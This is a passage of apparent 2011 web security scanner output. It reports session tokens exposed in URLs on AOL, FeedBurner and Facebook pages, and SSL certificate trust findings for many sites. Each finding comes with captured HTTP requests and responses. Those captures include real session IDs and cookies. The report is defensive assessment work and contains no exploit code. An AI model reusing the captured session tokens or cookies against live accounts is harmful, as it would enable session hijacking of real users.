Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close

11. Session token in URL previous next
There are 8 instances of this issue:

http://aolmobile.aol.com/registration/include/registration_unified.css
http://aolmobile.aol.com/registration/welcome
http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/
http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/
http://feedburner.google.com/fb/a/mailverify
https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do
http://weather.aol.com/
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

11.1. http://aolmobile.aol.com/registration/include/registration_unified.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://aolmobile.aol.com
Path:	/registration/include/registration_unified.css

Issue detail

The URL in the request appears to contain a session token within the query string:

http://aolmobile.aol.com/registration/include/registration_unified.css;jsessionid=31CD361837F0D202F18D7692A6450835.worker1

Request

GET /registration/include/registration_unified.css;jsessionid=31CD361837F0D202F18D7692A6450835.worker1 HTTP/1.1
Host: aolmobile.aol.com
Proxy-Connection: keep-alive
Referer: http://aolmobile.aol.com/registration/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=31CD361837F0D202F18D7692A6450835.worker1; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:31 GMT
Server: Apache
ETag: W/"14864-1302733922000"
Last-Modified: Wed, 13 Apr 2011 22:32:02 GMT
Cteonnt-Length: 14864
Content-Type: text/css
Content-Length: 14864

/*
Unified Mobile Registration .css file. There were 3 different files, aim, full, and reg.
Because of the embedded modal registration dialog we needed to combine these
into 1 file.
*/

/*
Common
*/
...[SNIP]...

11.2. http://aolmobile.aol.com/registration/welcome previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://aolmobile.aol.com
Path:	/registration/welcome

Issue detail

The response contains the following links that appear to contain session tokens:

http://aolmobile.aol.com/registration/include/registration_unified.css;jsessionid=8F6D3C0A981129FC794BD4887C56F1DB.worker1

Request

GET /registration/welcome HTTP/1.1
Host: aolmobile.aol.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575079886-Repeat%7C1367647079886%3B%20s_nrgvo%3DRepeat%7C1367647079887%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F6D3C0A981129FC794BD4887C56F1DB.worker1; Path=/registration
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 14044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <title>
...[SNIP]...
<meta http-equiv="cache-control" content="no-cache"/>

   <link type="text/css" rel="stylesheet" media="screen" href="/registration/include/registration_unified.css;jsessionid=8F6D3C0A981129FC794BD4887C56F1DB.worker1"/>


   <script src="/registration/include/jquery-1.5.1.min.js" type="text/javascript">
...[SNIP]...

11.3. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://aolproductcentral.aol.com
Path:	/category/pc-tools-and-storage/aol-computer-checkup/

Issue detail

The response contains the following links that appear to contain session tokens:

https://aolproductcentral.aol.com/control/additem;jsessionid=A72440ECFE31D381E77E9A5CDEE16DE0.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup

Request

GET /category/pc-tools-and-storage/aol-computer-checkup/ HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=A72440ECFE31D381E77E9A5CDEE16DE0.storefrontus-m03a; Path=/
Set-Cookie: OFBiz.Visitor=2832974; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 33251
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=A72440ECFE31D381E77E9A5CDEE16DE0.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup" class="tryitforfree" title="TRY IT FREE">TRY IT FREE</a>
...[SNIP]...

11.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://aolproductcentral.aol.com
Path:	/category/pc-tools-and-storage/aol-quick-check-live/

Issue detail

The response contains the following links that appear to contain session tokens:

https://aolproductcentral.aol.com/control/additem;jsessionid=10AA523C61D66A8550447791F0919E9D.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-quick-check-live-1

Request

GET /category/pc-tools-and-storage/aol-quick-check-live/ HTTP/1.1
Host: aolproductcentral.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:20 GMT
Set-Cookie: JSESSIONID=10AA523C61D66A8550447791F0919E9D.storefrontus-m03a; Path=/
Set-Cookie: OFBiz.Visitor=2832975; Expires=Fri, 04-May-2012 10:52:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 29919
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=10AA523C61D66A8550447791F0919E9D.storefrontus-m03a?categoryId=pc-tools-and-storage&brandName=aol-quick-check-live-1" class="tryitforfree" title="PURCHASE NOW">PURCHASE NOW</a>
...[SNIP]...

11.5. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

http://feedburner.google.com/fb/a/home?gsessionid=QCfNUmJbZJu2SDH5i0eLiw
http://feedburner.google.com/fb/a/tos?gsessionid=QCfNUmJbZJu2SDH5i0eLiw

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 10:53:03 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=QCfNUmJbZJu2SDH5i0eLiw; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Thu, 05 May 2011 10:53:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=QCfNUmJbZJu2SDH5i0eLiw">FeedBurner</a>
...[SNIP]...
<div id="footer">
©2004–2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=QCfNUmJbZJu2SDH5i0eLiw">Terms of Service</a>
...[SNIP]...

11.6. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://new.aol.com
Path:	/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do;jsessionid=396B36FE79F207ADC209410F3E2A4D38.prodwrp-d10

Request

GET /productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do;jsessionid=396B36FE79F207ADC209410F3E2A4D38.prodwrp-d10 HTTP/1.1
Host: new.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=396B36FE79F207ADC209410F3E2A4D38.prodwrp-d10; s_pers=%20s_getnr%3D1304575117715-Repeat%7C1367647117715%3B%20s_nrgvo%3DRepeat%7C1367647117717%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 420 unused
Date: Thu, 05 May 2011 01:03:51 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 09:52:45 GMT
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/html

<html>

<body>

<h2>Whew!</h2>

<h4>Thanks for putting 110% into signing up for AOL accounts.</h4>

<p>Love your passion! We'd also love a quick break to process your requests. Take a breather. Maybe
...[SNIP]...

11.7. http://weather.aol.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://weather.aol.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://weather.aol.com/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/africa/egypt/cairo/id/egxx0004;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/china/beijing/beijing/id/chxx0008;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/india/new-delhi/id/inxx0096;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/indonesia/jakarta/id/idxx0022;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/japan/tokyo/id/jaxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/philippines/manila/id/rpxx0017;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/asia/south-korea/seoul/id/ksxx0037;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/australia/sydney/id/asxx0112;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/central-america/mexico/distro-federal/mexico-city/id/mxdf0132;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/europe/france/paris/id/frxx0076;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/europe/spain/madrid/id/spxx0050;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/europe/turkey/istanbul/id/tuxx0014;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/europe/united-kingdom/england/london/id/ukxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/russia/moskovskaya/moscow/id/rsxx0063;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/south-america/argentina/buenos-aires/buenos-aires/id/arba0009;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/south-america/brazil/sao-paulo/sao-paulo/id/brxx0232;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/usa/california/los-angeles/id/usca0638;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/forecast/todays/usa/new-york/new-york/id/usny0996;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/mycities;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/weather-maps/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8
http://weather.aol.com/world;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8

Request

GET / HTTP/1.1
Host: weather.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0EB8EBCCF31C64980E700F996CC0E5F8; Path=/
Set-Cookie: wttempunit=f; Expires=Sat, 04-May-2013 10:56:16 GMT; Path=/
Keep-Alive: timeout=5, max=30
Connection: Keep-Alive
Content-Length: 50826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head
...[SNIP]...
<h2><a href="/mycities;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">My Cities</a>
...[SNIP]...
<li class="tempUnitSelFJSH degF current" title="Fahrenheit"><a href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8" id="mctFahUnit" class="tempValJSH tuSelFJSH">°F</a>
...[SNIP]...
<li class="tempUnitSelCJSH degC" title="Celsius"><a href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8" id="mctCelUnit" class="tempValJSH tuSelCJSH">°C</a>
...[SNIP]...
<div class="seeall"><a href="/mycities;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">See All</a>
...[SNIP]...
<li class="current">
<a class="cloud nationalMap" href="/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Cloud</a>
...[SNIP]...
<li class="browse">
<a href="/weather-maps/;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Browse All Maps</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/asia/china/beijing/beijing/id/chxx0008;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Beijing weather</a>
...[SNIP]...
<p class="cityLink"><a title="Not Available" href="/forecast/todays/south-america/argentina/buenos-aires/buenos-aires/id/arba0009;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Buenos Aires weather</a>
...[SNIP]...
<p class="cityLink"><a title="Haze" href="/forecast/todays/africa/egypt/cairo/id/egxx0004;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Cairo weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/europe/turkey/istanbul/id/tuxx0014;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Istanbul weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/asia/indonesia/jakarta/id/idxx0022;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Jakarta weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/united-kingdom/england/london/id/ukxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">London weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Clear" href="/forecast/todays/usa/california/los-angeles/id/usca0638;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Los Angeles weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/spain/madrid/id/spxx0050;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Madrid weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/asia/philippines/manila/id/rpxx0017;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Manila weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/central-america/mexico/distro-federal/mexico-city/id/mxdf0132;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Mexico City weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/russia/moskovskaya/moscow/id/rsxx0063;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Moscow weather</a>
...[SNIP]...
<p class="cityLink"><a title="Haze" href="/forecast/todays/asia/india/new-delhi/id/inxx0096;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">New Delhi weather</a>
...[SNIP]...
<p class="cityLink"><a title="Cloudy" href="/forecast/todays/usa/new-york/new-york/id/usny0996;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">New York weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/europe/france/paris/id/frxx0076;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Paris weather</a>
...[SNIP]...
<p class="cityLink"><a title="Fog" href="/forecast/todays/south-america/brazil/sao-paulo/sao-paulo/id/brxx0232;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Sao Paulo weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Sunny" href="/forecast/todays/asia/south-korea/seoul/id/ksxx0037;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Seoul weather</a>
...[SNIP]...
<p class="cityLink"><a title="Partly Cloudy" href="/forecast/todays/australia/sydney/id/asxx0112;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Sydney weather</a>
...[SNIP]...
<p class="cityLink"><a title="Mostly Cloudy" href="/forecast/todays/asia/japan/tokyo/id/jaxx0085;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Tokyo weather</a>
...[SNIP]...
<p class="more"><a href="/world;jsessionid=0EB8EBCCF31C64980E700F996CC0E5F8">Browse the World</a>
...[SNIP]...

11.8. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

12. SSL certificate previous next
There are 19 instances of this issue:

https://secure.opinionlab.com/
https://www.facebook.com/
https://account.login.aol.com/
https://adwords.google.com/
https://aolproductcentral.aol.com/
https://api.screenname.aol.com/
https://at.atwola.com/
https://bill.aol.com/
https://chrome.google.com/
https://maps-api-ssl.google.com/
https://my.screenname.aol.com/
https://new.aol.com/
https://rsp.web.aol.com/
https://spreadsheets.google.com/
https://twitter.com/
https://us.etrade.com/
https://www.fightmagazine.com/
https://www.godaddy.com/
https://www.neodata.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

12.1. https://secure.opinionlab.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.opinionlab.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Jun 15 19:00:00 CDT 2009
Valid to:	Mon Jul 11 18:59:59 CDT 2011

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

12.2. https://www.facebook.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	www.facebook.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Sun Nov 14 18:00:00 CST 2010
Valid to:	Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

12.3. https://account.login.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://account.login.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	account.login.aol.com
Issued by:	AOL Member CA
Valid from:	Wed Jul 28 10:09:21 CDT 2010
Valid to:	Fri Jul 27 10:09:21 CDT 2012

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.4. https://adwords.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/

